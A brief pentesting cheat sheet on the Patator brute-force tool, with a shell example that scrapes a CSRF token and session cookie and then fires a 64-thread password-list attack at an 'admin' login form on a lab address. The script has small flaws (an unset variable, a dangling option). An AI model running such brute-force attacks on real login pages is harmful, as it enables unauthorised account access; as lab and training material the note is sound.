# Patator Bruteforcing

* [Lanjelot's Repo](https://github.com/lanjelot/patator/)

## Modules

* Available modules can be found under `patator --help`
* Module specifics can be found via `patator <module> -h`

## Using a Module

* For example `http_fuzz` can be used via
```sh
TARGET_IP=10.0.47.11
CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')

echo "The CSRF is: $CSRF"
echo "The PHPSESSID is: $SESSION_ID"

patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x 
```